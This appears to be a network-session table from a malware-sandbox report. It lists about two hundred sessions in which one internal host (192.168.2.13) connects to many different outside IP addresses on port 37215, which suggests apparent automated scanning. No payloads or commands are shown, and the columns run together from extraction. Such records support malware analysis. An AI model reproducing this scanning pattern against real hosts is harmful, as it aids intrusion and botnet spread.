                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15573192.168.2.1349672157.25.170.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15574192.168.2.133992041.182.238.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15575192.168.2.1351680197.74.119.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15576192.168.2.135193241.38.112.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15577192.168.2.1338280170.115.63.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15578192.168.2.1335980157.21.115.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15579192.168.2.134777841.107.241.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15580192.168.2.1336434157.136.32.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15581192.168.2.1355578157.192.91.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15582192.168.2.133994841.218.44.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15583192.168.2.1333050197.54.118.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15584192.168.2.135696241.207.250.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15585192.168.2.1342398197.101.85.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15586192.168.2.135250241.81.238.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15587192.168.2.1344830197.144.73.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15588192.168.2.134439268.190.175.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15589192.168.2.136073625.154.199.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15590192.168.2.133783841.60.204.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15591192.168.2.1339094197.162.41.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15592192.168.2.135742844.132.192.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15593192.168.2.135687241.141.220.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15594192.168.2.1343082197.102.198.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15595192.168.2.1333704157.39.107.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15596192.168.2.1345322157.60.113.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15597192.168.2.1359506217.213.62.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15598192.168.2.1347256197.122.139.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15599192.168.2.1339148157.138.194.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15600192.168.2.1346292197.70.197.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15601192.168.2.1349770142.68.140.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15602192.168.2.1351802208.120.43.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15603192.168.2.135690041.184.72.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15604192.168.2.1353260157.134.204.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15605192.168.2.135660041.41.37.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15606192.168.2.1333574157.95.136.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15607192.168.2.1359098157.166.93.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15608192.168.2.1356844157.151.142.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15609192.168.2.1348676197.79.38.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15610192.168.2.1336824197.52.17.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15611192.168.2.1344526157.104.126.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15612192.168.2.1337822166.120.6.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15613192.168.2.1352450197.241.3.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15614192.168.2.1360426197.92.224.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15615192.168.2.1333286157.160.78.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15616192.168.2.1344880157.154.55.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15617192.168.2.1346004157.196.158.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15618192.168.2.134595041.210.226.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15619192.168.2.1341212197.135.221.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15620192.168.2.1345312115.227.231.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15621192.168.2.1359048167.238.4.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15622192.168.2.133514241.82.45.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15623192.168.2.1340800197.2.61.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15624192.168.2.135552641.19.1.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15625192.168.2.1348840157.169.214.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15626192.168.2.1336932151.109.69.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15627192.168.2.133324694.95.91.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15628192.168.2.1350674112.13.69.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15629192.168.2.134067841.143.107.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15630192.168.2.1340426157.154.50.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15631192.168.2.1343360157.17.252.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15632192.168.2.1356752157.15.31.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15633192.168.2.1341466157.61.160.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15634192.168.2.1338508118.57.239.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15635192.168.2.135908641.173.26.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15636192.168.2.1340160204.138.96.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15637192.168.2.1350240197.56.149.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15638192.168.2.134370041.41.231.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15639192.168.2.1340140197.43.201.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15640192.168.2.134095641.215.212.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15641192.168.2.135814492.127.97.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15642192.168.2.1339896197.81.63.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15643192.168.2.134869241.121.224.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15644192.168.2.1340580197.208.246.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15645192.168.2.1333512195.205.44.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15646192.168.2.1345428197.196.192.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15647192.168.2.134863041.249.248.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15648192.168.2.133646838.7.177.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15649192.168.2.1358176197.54.83.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15650192.168.2.1337150197.106.48.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15651192.168.2.1344842197.23.187.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15652192.168.2.134836241.97.190.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15653192.168.2.1352104197.208.211.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15654192.168.2.1341060157.72.214.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15655192.168.2.1346934157.79.57.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15656192.168.2.135159093.59.55.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15657192.168.2.133784436.43.110.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15658192.168.2.135836041.218.226.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15659192.168.2.1355436157.105.207.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15660192.168.2.1359884197.183.249.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15661192.168.2.1358374171.15.129.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15662192.168.2.1338542157.160.19.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15663192.168.2.133410666.245.155.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15664192.168.2.1360874114.146.199.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15665192.168.2.134196441.160.70.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15666192.168.2.134325441.40.31.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15667192.168.2.135496841.86.85.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15668192.168.2.1346842157.98.36.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15669192.168.2.1355116201.217.87.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15670192.168.2.1354940197.28.199.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15671192.168.2.1338026157.218.18.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15672192.168.2.1350996157.121.35.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15673192.168.2.1333680197.106.30.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15674192.168.2.1334104157.28.193.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15675192.168.2.1334800197.144.238.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15676192.168.2.1343040157.7.158.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15677192.168.2.135865680.10.118.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15678192.168.2.1338338157.118.85.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15679192.168.2.1347566157.16.27.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15680192.168.2.136069242.241.149.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15681192.168.2.133790241.78.200.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15682192.168.2.1338554157.129.158.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15683192.168.2.1349224190.115.76.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15684192.168.2.1339458197.40.52.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15685192.168.2.133765841.184.167.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15686192.168.2.135977641.104.141.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15687192.168.2.1349608197.239.234.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15688192.168.2.135027841.104.59.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15689192.168.2.135005063.230.63.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15690192.168.2.1342242197.48.135.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15691192.168.2.1332818197.180.1.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15692192.168.2.1352040157.154.195.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15693192.168.2.1356664197.47.187.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15694192.168.2.1357980197.230.135.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15695192.168.2.1355460162.60.150.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15696192.168.2.1360770157.238.25.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15697192.168.2.1340362157.43.217.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15698192.168.2.1350208197.57.99.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15699192.168.2.133965041.92.230.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15700192.168.2.1347562157.44.91.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15701192.168.2.1356424197.115.238.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15702192.168.2.134444239.84.130.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15703192.168.2.1341946197.152.97.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15704192.168.2.135495841.152.223.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15705192.168.2.1359234110.80.107.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15706192.168.2.1343622157.51.58.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15707192.168.2.1346936157.127.26.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15708192.168.2.136063441.108.221.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15709192.168.2.1335848157.219.45.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15710192.168.2.133985431.56.211.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15711192.168.2.1350116197.10.92.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15712192.168.2.1333982157.254.35.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15713192.168.2.1346150157.50.146.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15714192.168.2.1336288197.249.109.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15715192.168.2.1357688197.151.177.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15716192.168.2.1347912197.218.240.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15717192.168.2.1346428157.191.177.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15718192.168.2.1339916197.214.103.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15719192.168.2.1343172197.134.179.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15720192.168.2.135011279.18.128.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15721192.168.2.1356676157.95.112.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15722192.168.2.1337474157.228.100.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15723192.168.2.134398441.98.254.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15724192.168.2.1333554197.90.190.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15725192.168.2.134541241.230.223.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15726192.168.2.1357626189.97.6.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15727192.168.2.1356730157.161.84.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15728192.168.2.1337914197.98.179.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15729192.168.2.134947441.154.112.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15730192.168.2.135669641.38.36.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15731192.168.2.1356978131.76.248.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15732192.168.2.1358868157.153.104.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15733192.168.2.134278841.66.33.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15734192.168.2.1349184157.155.184.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15735192.168.2.134802841.191.229.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15736192.168.2.1343582150.99.243.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15737192.168.2.1351334197.144.38.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15738192.168.2.1336894163.58.236.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15739192.168.2.133872041.234.102.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15740192.168.2.1357600157.8.11.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15741192.168.2.135917041.110.36.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15742192.168.2.135910241.210.69.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15743192.168.2.1352016197.195.23.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15744192.168.2.1358094210.139.194.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15745192.168.2.134896441.186.164.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15746192.168.2.1353294197.151.152.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15747192.168.2.134594041.123.197.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15748192.168.2.134466241.36.238.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15749192.168.2.1349630197.160.124.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15750192.168.2.1360736197.13.99.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15751192.168.2.134333841.200.92.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15752192.168.2.1353626157.171.116.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15753192.168.2.135032241.11.252.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15754192.168.2.1356598197.212.201.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15755192.168.2.134164441.79.187.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15756192.168.2.1356404101.164.173.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15757192.168.2.1333394197.157.204.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15758192.168.2.1350698157.98.199.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15759192.168.2.1348554157.131.117.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15760192.168.2.1337352157.81.13.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15761192.168.2.1333236157.176.139.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15762192.168.2.1350490157.133.39.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15763192.168.2.1334040135.151.116.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15764192.168.2.1348528157.71.139.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15765192.168.2.1338206197.50.128.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15766192.168.2.1334192135.213.185.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15767192.168.2.135670841.184.184.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15768192.168.2.134244041.116.217.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15769192.168.2.135061868.53.13.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15770192.168.2.1350234197.89.248.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15771192.168.2.133654820.152.236.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15772192.168.2.134605241.108.12.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15773192.168.2.135898841.97.72.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15774192.168.2.1337892121.40.195.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15775192.168.2.1336666197.146.13.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15776192.168.2.1357546151.56.95.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15777192.168.2.1351232197.222.70.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15778192.168.2.1345138157.243.85.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15779192.168.2.1346082157.96.27.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15780192.168.2.1352582197.147.247.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15781192.168.2.1343094197.243.173.24837215
                                                  TimestampBytes transferredDirectionData


